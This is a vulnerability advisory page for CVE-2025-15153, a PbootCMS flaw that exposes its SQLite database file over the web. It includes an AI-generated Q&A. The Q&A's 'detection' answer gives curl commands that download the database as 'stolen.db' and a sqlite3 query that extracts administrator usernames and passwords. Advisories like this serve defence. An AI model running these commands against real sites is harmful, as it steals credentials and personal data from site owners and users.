CVE-2025-15153
Unauthorized File Access via SQLite Database in PbootCMS
Publication date: 2025-12-28
Last updated on: 2026-04-29
Assigner: VulDB
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| pbootcms | pbootcms | 3.2.12 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-552 | The product makes files or directories accessible to unauthorized actors, even though they should not be. |
| CWE-425 | The web application does not adequately enforce appropriate authorization on all restricted URLs, scripts, or files. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
This vulnerability is a weakness in PbootCMS up to version 3.2.12 related to the SQLite database file /data/pbootcms.db. It allows an attacker to manipulate this file or its functions, potentially making files or directories accessible that should not be. The attack can be launched remotely but is highly complex and difficult to exploit. The exploit is publicly available, and modifying configuration settings is recommended to mitigate the risk.
How can this vulnerability impact me? :
The vulnerability can lead to unauthorized access to files or directories within the system, which may expose sensitive data or system information. Although the exploitability is difficult, the fact that the exploit is publicly available increases the risk. This could compromise the confidentiality of data stored in the affected system.
What immediate steps should I take to mitigate this vulnerability?
Modifying the configuration settings of PbootCMS is advised to mitigate this vulnerability.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
This vulnerability exposes sensitive information such as administrator credentials, user personal data, SMTP passwords, and API secrets due to the SQLite database file being accessible without proper access controls. Such exposure can lead to unauthorized access to personal and confidential data, which violates data protection requirements under standards like GDPR and HIPAA. The unauthorized disclosure of personal and sensitive information compromises confidentiality obligations, potentially resulting in non-compliance with these regulations. [1, 2, 3]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by checking if the SQLite database file is accessible via the web server before the first admin login. You can use the following commands to verify accessibility and download the database file for inspection: 1. Check if the database file is accessible: ```curl -I "http://<target>/data/pbootcms.db"``` Look for HTTP 200 OK response with content type 'application/octet-stream'. 2. Download the database file: ```curl -o stolen.db "http://<target>/data/pbootcms.db"``` 3. Confirm the file type: ```file stolen.db``` Expected output: SQLite 3.x database. 4. Extract administrator credentials from the database: ```sqlite3 stolen.db "SELECT id, username, password FROM ay_user;"``` These steps help detect if the database file is exposed and vulnerable to unauthorized access. [2]